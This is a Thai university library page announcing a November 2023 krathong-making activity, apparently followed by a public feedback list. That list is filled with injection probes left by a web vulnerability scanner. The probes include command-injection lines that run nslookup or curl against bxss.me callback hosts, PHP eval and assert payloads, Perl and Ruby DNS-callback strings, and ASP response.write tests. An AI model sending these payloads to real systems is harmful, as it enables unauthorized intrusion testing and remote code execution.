มหาวิทยาลัยราชภัฏกำแพงเพชร

กิจกรรม สำนักวิทยบริการและเทคโนโลยีสารสนเทศ

วันที่ 17 สิงหาคม 2558 - 31 ตุลาคม 2582


กิจกรรมประดิษฐ์กระทงจากวัสดุธรรมชาติ

โครงการบริการวิชาการและส่งเสริมการใช้แหล่งเรียนรู้ "กิจกรรมประดิษฐ์กระทงจากวัสดุธรรมชาติ"

วันที่ 27 พฤศจิกายน 2566 เวลา 08.30-16.30 น. สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏกำแพงเพชร จัดกิจกรรมสืบสานประเพณีไทยวันลอยกระทง ประดิษฐ์กระทงจากวัสดุธรรมชาติ ณ ลานกิจกรรม หน้าอาคารสำนักวิทยบริการฯ โดย ประดิษฐ์กระทงจากวัสดุธรรมชาติ และประกวดกระทงสวยงาม

https://arit.kpru.ac.th/page_id/1291/TH


ข้อเสนอแนะ
2023-12-12 08:14:17 1
2023-12-12 08:14:17 1
2023-12-12 08:14:17 1
2023-12-12 08:14:17 1
2023-12-12 08:14:17 1
2023-12-12 08:14:17 1
2023-12-12 08:14:15 1
2023-12-12 08:14:15 1
2023-12-12 08:14:15 1
2023-12-12 08:14:14 1
2023-12-12 08:14:14 1
2023-12-12 08:14:14 1
2023-12-12 08:14:14 1
2023-12-12 08:14:14 1
2023-12-12 08:14:14 1
2023-12-12 08:14:13 1
2023-12-12 08:14:13 1
2023-12-12 08:14:13 1
2023-12-12 08:14:12 '.print(md5(31337)).'
2023-12-12 08:14:12 ${@print(md5(31337))}\
2023-12-12 08:14:12 ${@print(md5(31337))}
2023-12-12 08:14:12 ";print(md5(31337));$a="
2023-12-12 08:14:12 ';print(md5(31337));$a='
2023-12-12 08:14:11 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
2023-12-12 08:14:08 1
2023-12-12 08:14:08 1
2023-12-12 08:14:07 1
2023-12-12 08:14:07 1
2023-12-12 08:14:07 1
2023-12-12 08:14:07 1
2023-12-12 08:14:06 555
2023-12-12 08:14:06 ".gethostbyname(lc("hitde"."xxdwbmolc3986.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(72).chr(106).chr(90)."
2023-12-12 08:14:06 '.gethostbyname(lc('hitzm'.'zxggtqdmba633.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(68).chr(110).chr(79).'
2023-12-12 08:14:05 1
2023-12-12 08:14:05 1
2023-12-12 08:14:04 1
2023-12-12 08:14:04 1
2023-12-12 08:14:04 1
2023-12-12 08:14:04 1
2023-12-12 08:14:03 1
2023-12-12 08:14:03 1
2023-12-12 08:14:03 1
2023-12-12 08:14:00 1
2023-12-12 08:13:58 1
2023-12-12 08:13:58 1
2023-12-12 08:13:58 1
2023-12-12 08:13:58 1
2023-12-12 08:13:57 1
2023-12-12 08:13:57 1
2023-12-12 08:13:57 1
2023-12-12 08:13:57 1
2023-12-12 08:13:57 1
2023-12-12 08:13:57 1
2023-12-12 08:13:56 1
2023-12-12 08:13:56 1
2023-12-12 08:13:56 1
2023-12-12 08:13:56 1
2023-12-12 08:13:56 555
2023-12-12 08:13:56 1
2023-12-12 08:13:56 1
2023-12-12 08:13:56 1
2023-12-12 08:13:55 1
2023-12-12 08:13:55 1
2023-12-12 08:13:55 1
2023-12-12 08:13:55 1
2023-12-12 08:13:54 1
2023-12-12 08:13:54 1
2023-12-12 08:13:54 1
2023-12-12 08:13:54 ;(nslookup -q=cname hithgjdrzwzum0ac97.bxss.me||curl hithgjdrzwzum0ac97.bxss.me)|(nslookup -q=cname hithgjdrzwzum0ac97.bxss.me||curl hithgjdrzwzum0ac97.bxss.me)&(nslookup -q=cname hithgjdrzwzum0ac97.bxss.me||curl hithgjdrzwzum0ac97.bxss.me)
2023-12-12 08:13:53 `(nslookup -q=cname hitukhzdavvyx9b7b6.bxss.me||curl hitukhzdavvyx9b7b6.bxss.me)`
2023-12-12 08:13:53 |(nslookup -q=cname hitscholmnrjm675d7.bxss.me||curl hitscholmnrjm675d7.bxss.me)
2023-12-12 08:13:53 &(nslookup -q=cname hitknuaqwfajy4a395.bxss.me||curl hitknuaqwfajy4a395.bxss.me)&'\"`0&(nslookup -q=cname hitknuaqwfajy4a395.bxss.me||curl hitknuaqwfajy4a395.bxss.me)&`'
2023-12-12 08:13:53 &nslookup -q=cname hitxudepfwytg51790.bxss.me&'\"`0&nslookup -q=cname hitxudepfwytg51790.bxss.me&`'
2023-12-12 08:13:53 $(nslookup -q=cname hitwkliittbyh63f0b.bxss.me||curl hitwkliittbyh63f0b.bxss.me)
2023-12-12 08:13:53 (nslookup -q=cname hiteiaewrbpyjc6a1b.bxss.me||curl hiteiaewrbpyjc6a1b.bxss.me))
2023-12-12 08:13:53 1|echo pogerr$()\ zfbyup\nz^xyu||a #' |echo pogerr$()\ zfbyup\nz^xyu||a #|" |echo pogerr$()\ zfbyup\nz^xyu||a #
2023-12-12 08:13:47 |echo rlitsb$()\ cfhlus\nz^xyu||a #' |echo rlitsb$()\ cfhlus\nz^xyu||a #|" |echo rlitsb$()\ cfhlus\nz^xyu||a #
2023-12-12 08:13:46 1&echo vrxxak$()\ gssgcr\nz^xyu||a #' &echo vrxxak$()\ gssgcr\nz^xyu||a #|" &echo vrxxak$()\ gssgcr\nz^xyu||a #
2023-12-12 08:13:46 &echo ktoslv$()\ ooeqzc\nz^xyu||a #' &echo ktoslv$()\ ooeqzc\nz^xyu||a #|" &echo ktoslv$()\ ooeqzc\nz^xyu||a #
2023-12-12 08:13:46 echo olsezl$()\ ituwgv\nz^xyu||a #' &echo olsezl$()\ ituwgv\nz^xyu||a #|" &echo olsezl$()\ ituwgv\nz^xyu||a #
2023-12-12 08:13:41 1
2023-12-12 08:13:39 1
2023-12-12 08:13:24 1
2023-12-12 08:13:24 1
2023-12-12 08:13:24 1
2023-12-12 08:13:23 1
2023-12-12 08:13:23 1
2023-12-12 08:13:23 '+'A'.concat(70-3).concat(22*4).concat(122).concat(77).concat(104).concat(73)+(require'socket' Socket.gethostbyname('hithj'+'kfvblogy41947.bxss.me.')[3].to_s)+'
2023-12-12 08:13:23 "+"A".concat(70-3).concat(22*4).concat(118).concat(77).concat(115).concat(86)+(require"socket" Socket.gethostbyname("hittt"+"rrzhdvyh9a815.bxss.me.")[3].to_s)+"
2023-12-12 08:13:22 1
2023-12-12 08:13:21 1
2023-12-12 08:13:21 1
2023-12-12 08:13:21 1
2023-12-12 08:13:20 1
2023-12-12 08:13:20 1
2023-12-12 08:13:20 1
2023-12-12 08:13:19 1
2023-12-12 08:13:19 1
2023-12-12 08:13:19 1
2023-12-12 08:13:19 "+response.write(9970745*9514597)+"
2023-12-12 08:13:19 '+response.write(9970745*9514597)+'
2023-12-12 08:13:19 response.write(9970745*9514597)
2023-12-12 08:10:37 555
2023-12-12 08:10:37 555
2023-12-12 08:10:37 555
2023-12-12 08:10:36 555
2023-12-12 08:10:36 555
2023-12-12 08:10:36 555
2023-12-12 08:10:36 555
2023-12-12 08:10:36 555
2023-12-12 08:10:36 555
2023-12-12 08:10:35 555
2023-12-12 08:10:35 555
2023-12-12 08:10:35 555
2023-12-12 08:10:35 555
2023-12-12 08:10:35 555
2023-12-12 08:10:35 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:34 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 555
2023-12-12 08:10:33 ;(nslookup -q=cname hitadkgvxekghfde82.bxss.me||curl hitadkgvxekghfde82.bxss.me)|(nslookup -q=cname hitadkgvxekghfde82.bxss.me||curl hitadkgvxekghfde82.bxss.me)&(nslookup -q=cname hitadkgvxekghfde82.bxss.me||curl hitadkgvxekghfde82.bxss.me)
2023-12-12 08:10:33 555
2023-12-12 08:10:33 `(nslookup -q=cname hitanwgfqdngm9fbce.bxss.me||curl hitanwgfqdngm9fbce.bxss.me)`
2023-12-12 08:10:33 555
2023-12-12 08:10:33 |(nslookup -q=cname hitujmywietgu32eb6.bxss.me||curl hitujmywietgu32eb6.bxss.me)
2023-12-12 08:10:32 555
2023-12-12 08:10:32 &(nslookup -q=cname hitdzvqwpvbru37bf7.bxss.me||curl hitdzvqwpvbru37bf7.bxss.me)&'\"`0&(nslookup -q=cname hitdzvqwpvbru37bf7.bxss.me||curl hitdzvqwpvbru37bf7.bxss.me)&`'
2023-12-12 08:10:32 '.print(md5(31337)).'
2023-12-12 08:10:32 555
2023-12-12 08:10:32 &nslookup -q=cname hitxrrgqbomny0dda3.bxss.me&'\"`0&nslookup -q=cname hitxrrgqbomny0dda3.bxss.me&`'
2023-12-12 08:10:32 ${@print(md5(31337))}\
2023-12-12 08:10:32 $(nslookup -q=cname hitfajxmtengq9fac3.bxss.me||curl hitfajxmtengq9fac3.bxss.me)
2023-12-12 08:10:32 ${@print(md5(31337))}
2023-12-12 08:10:31 (nslookup -q=cname hitdloamfoqinfcb4e.bxss.me||curl hitdloamfoqinfcb4e.bxss.me))
2023-12-12 08:10:31 ";print(md5(31337));$a="
2023-12-12 08:10:31 555|echo zahyos$()\ wcinrp\nz^xyu||a #' |echo zahyos$()\ wcinrp\nz^xyu||a #|" |echo zahyos$()\ wcinrp\nz^xyu||a #
2023-12-12 08:10:31 ';print(md5(31337));$a='
2023-12-12 08:10:31 |echo xeaefp$()\ fxyixk\nz^xyu||a #' |echo xeaefp$()\ fxyixk\nz^xyu||a #|" |echo xeaefp$()\ fxyixk\nz^xyu||a #
2023-12-12 08:10:31 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
2023-12-12 08:10:31 555&echo kcgats$()\ fyegue\nz^xyu||a #' &echo kcgats$()\ fyegue\nz^xyu||a #|" &echo kcgats$()\ fyegue\nz^xyu||a #
2023-12-12 08:10:31 555
2023-12-12 08:10:31 &echo eieqxb$()\ hmvwyv\nz^xyu||a #' &echo eieqxb$()\ hmvwyv\nz^xyu||a #|" &echo eieqxb$()\ hmvwyv\nz^xyu||a #
2023-12-12 08:10:31 echo hsmzyk$()\ kxmliy\nz^xyu||a #' &echo hsmzyk$()\ kxmliy\nz^xyu||a #|" &echo hsmzyk$()\ kxmliy\nz^xyu||a #
2023-12-12 08:10:31 555
2023-12-12 08:10:31 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:30 555
2023-12-12 08:10:29 555
2023-12-12 08:10:29 555
2023-12-12 08:10:29 555
2023-12-12 08:10:29 555
2023-12-12 08:10:29 555
2023-12-12 08:10:29 555
2023-12-12 08:10:28 555
2023-12-12 08:10:27 555
2023-12-12 08:10:27 555
2023-12-12 08:10:27 555
2023-12-12 08:10:27 ".gethostbyname(lc("hitrm"."srezsenu0ab53.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(69).chr(103).chr(77)."
2023-12-12 08:10:27 '.gethostbyname(lc('hitfy'.'flyrzynwa4d49.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(73).chr(106).chr(90).'
2023-12-12 08:10:27 555
2023-12-12 08:10:26 555
2023-12-12 08:10:25 555
2023-12-12 08:10:25 555
2023-12-12 08:10:25 555
2023-12-12 08:10:25 555
2023-12-12 08:10:25 555
2023-12-12 08:10:24 '+'A'.concat(70-3).concat(22*4).concat(111).concat(79).concat(98).concat(71)+(require'socket' Socket.gethostbyname('hitab'+'whmuidghfcb19.bxss.me.')[3].to_s)+'
2023-12-12 08:10:24 "+"A".concat(70-3).concat(22*4).concat(112).concat(68).concat(121).concat(66)+(require"socket" Socket.gethostbyname("hitny"+"tukzazpva9c9a.bxss.me.")[3].to_s)+"
2023-12-12 08:10:24 555
2023-12-12 08:10:24 555
2023-12-12 08:10:24 555
2023-12-12 08:10:24 555
2023-12-12 08:10:24 555
2023-12-12 08:10:23 555
2023-12-12 08:10:23 555
2023-12-12 08:10:23 555
2023-12-12 08:10:23 "+response.write(9945824*9647638)+"
2023-12-12 08:10:21 '+response.write(9945824*9647638)+'
2023-12-12 08:10:18 response.write(9945824*9647638)
2023-12-12 08:10:16 555
2023-12-12 08:10:16 555
2023-12-12 08:10:16 555
2023-12-12 08:10:13 555
2023-12-12 08:10:13 555
2023-12-12 08:10:13 555
2023-12-12 08:10:13 555
2023-12-12 08:10:13 555
2023-12-12 08:10:12 555
2023-12-12 08:10:12 555
2023-12-12 08:10:12 555
2023-12-12 08:10:12 555
2023-12-12 08:10:12 555
2023-12-12 08:10:11 555
2023-12-12 08:10:11 555
2023-12-12 08:10:10 555
2023-12-12 08:10:10 555
2023-12-12 08:10:10 '.print(md5(31337)).'
2023-12-12 08:10:10 555
2023-12-12 08:10:10 ${@print(md5(31337))}\
2023-12-12 08:10:10 555
2023-12-12 08:10:10 ${@print(md5(31337))}
2023-12-12 08:10:10 555
2023-12-12 08:10:09 ";print(md5(31337));$a="
2023-12-12 08:10:09 555
2023-12-12 08:10:09 ';print(md5(31337));$a='
2023-12-12 08:10:09 555
2023-12-12 08:10:09 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
2023-12-12 08:10:09 555
2023-12-12 08:10:07 555
2023-12-12 08:10:07 555
2023-12-12 08:10:07 555
2023-12-12 08:10:07 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:06 555
2023-12-12 08:10:05 555
2023-12-12 08:10:05 555
2023-12-12 08:10:05 555
2023-12-12 08:10:05 555
2023-12-12 08:10:05 555
2023-12-12 08:10:05 555
2023-12-12 08:10:05 555
2023-12-12 08:10:04 555
2023-12-12 08:10:04 555
2023-12-12 08:10:04 555
2023-12-12 08:10:03 555
2023-12-12 08:10:03 555
2023-12-12 08:10:03 ".gethostbyname(lc("hitrs"."bxeopptmc4350.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(89).chr(116).chr(89)."
2023-12-12 08:10:02 '.gethostbyname(lc('hitbv'.'hypxbnzec79bb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(120).chr(65).'
2023-12-12 08:10:02 ;(nslookup -q=cname hitfgvezqemoh99fc1.bxss.me||curl hitfgvezqemoh99fc1.bxss.me)|(nslookup -q=cname hitfgvezqemoh99fc1.bxss.me||curl hitfgvezqemoh99fc1.bxss.me)&(nslookup -q=cname hitfgvezqemoh99fc1.bxss.me||curl hitfgvezqemoh99fc1.bxss.me)
2023-12-12 08:10:02 555
2023-12-12 08:10:02 `(nslookup -q=cname hitetgwmmqmfce17b1.bxss.me||curl hitetgwmmqmfce17b1.bxss.me)`
2023-12-12 08:10:02 555
2023-12-12 08:10:02 |(nslookup -q=cname hitrlwdcybbff405ee.bxss.me||curl hitrlwdcybbff405ee.bxss.me)
2023-12-12 08:10:01 &(nslookup -q=cname hitzfuebbxjbke4246.bxss.me||curl hitzfuebbxjbke4246.bxss.me)&'\"`0&(nslookup -q=cname hitzfuebbxjbke4246.bxss.me||curl hitzfuebbxjbke4246.bxss.me)&`'
2023-12-12 08:10:01 &nslookup -q=cname hithhlwwtaipaaf23a.bxss.me&'\"`0&nslookup -q=cname hithhlwwtaipaaf23a.bxss.me&`'
2023-12-12 08:10:01 $(nslookup -q=cname hitghpunmkupm2b73b.bxss.me||curl hitghpunmkupm2b73b.bxss.me)
2023-12-12 08:09:36 (nslookup -q=cname hithhyscvpaat3eeb3.bxss.me||curl hithhyscvpaat3eeb3.bxss.me))
2023-12-12 08:09:30 555|echo vpekmo$()\ wqixpl\nz^xyu||a #' |echo vpekmo$()\ wqixpl\nz^xyu||a #|" |echo vpekmo$()\ wqixpl\nz^xyu||a #
2023-12-12 08:09:30 |echo hckugq$()\ qxkzaf\nz^xyu||a #' |echo hckugq$()\ qxkzaf\nz^xyu||a #|" |echo hckugq$()\ qxkzaf\nz^xyu||a #
2023-12-12 08:09:27 555&echo myneme$()\ oiecnr\nz^xyu||a #' &echo myneme$()\ oiecnr\nz^xyu||a #|" &echo myneme$()\ oiecnr\nz^xyu||a #
2023-12-12 08:09:02 &echo otuiwv$()\ nqmols\nz^xyu||a #' &echo otuiwv$()\ nqmols\nz^xyu||a #|" &echo otuiwv$()\ nqmols\nz^xyu||a #
2023-12-12 08:08:53 echo rbymbx$()\ crcxkg\nz^xyu||a #' &echo rbymbx$()\ crcxkg\nz^xyu||a #|" &echo rbymbx$()\ crcxkg\nz^xyu||a #
2023-12-12 08:08:53 555
2023-12-12 08:08:53 555
2023-12-12 08:08:53 555
2023-12-12 08:08:53 555
2023-12-12 08:08:52 555
2023-12-12 08:08:52 555
2023-12-12 08:08:52 555
2023-12-12 08:08:52 555
2023-12-12 08:08:52 555
2023-12-12 08:08:52 555
2023-12-12 08:08:51 555
2023-12-12 08:08:51 555
2023-12-12 08:08:47 555
2023-12-12 08:08:47 555
2023-12-12 08:08:47 555
2023-12-12 08:08:40 555
2023-12-12 08:08:40 '+'A'.concat(70-3).concat(22*4).concat(106).concat(74).concat(101).concat(79)+(require'socket' Socket.gethostbyname('hitic'+'nxusixfl7b5ae.bxss.me.')[3].to_s)+'
2023-12-12 08:08:40 "+"A".concat(70-3).concat(22*4).concat(106).concat(77).concat(105).concat(65)+(require"socket" Socket.gethostbyname("hitph"+"cjrngjtp176d2.bxss.me.")[3].to_s)+"
2023-12-12 08:08:40 555
2023-12-12 08:08:40 555
2023-12-12 08:08:38 555
2023-12-12 08:08:38 555
2023-12-12 08:08:38 555
2023-12-12 08:08:38 555
2023-12-12 08:08:38 555
2023-12-12 08:08:38 555
2023-12-12 08:08:37 "+response.write(9332046*9542509)+"
2023-12-12 08:08:37 '+response.write(9332046*9542509)+'
2023-12-12 08:08:37 response.write(9332046*9542509)
2023-12-12 08:08:37 555
2023-12-12 08:08:36 555
2023-12-12 08:08:36 555
2023-12-12 08:07:57 555
2023-12-12 08:07:19 555
2023-12-12 08:04:20 555
2023-12-12 08:04:20 555
2023-12-12 08:03:34 1
2023-12-12 08:03:34 1

การให้ความยินยอมในการเก็บรวบรวม ใช้ และเปิดเผยข้อมูลส่วนบุคคลของมหาวิทยาลัยราชภัฏกำแพงเพชร คุณรับทราบ ได้อ่าน และทำความเข้าใจเกี่ยวกับ 1)คําสงวนสิทธิ์และการปฏิเสธความรับผิดชอบ(Disclaimer) https://arit.kpru.ac.th/sh/e6c7c2 2) นโยบายการคุ้มครองข้อมูลส่วนบุคคล(PDPA) https://arit.kpru.ac.th/sh/2c678e และยินยอม ตามเงื่อนไขการเข้าร่วมกิจกรรมของมหาวิทยาลัย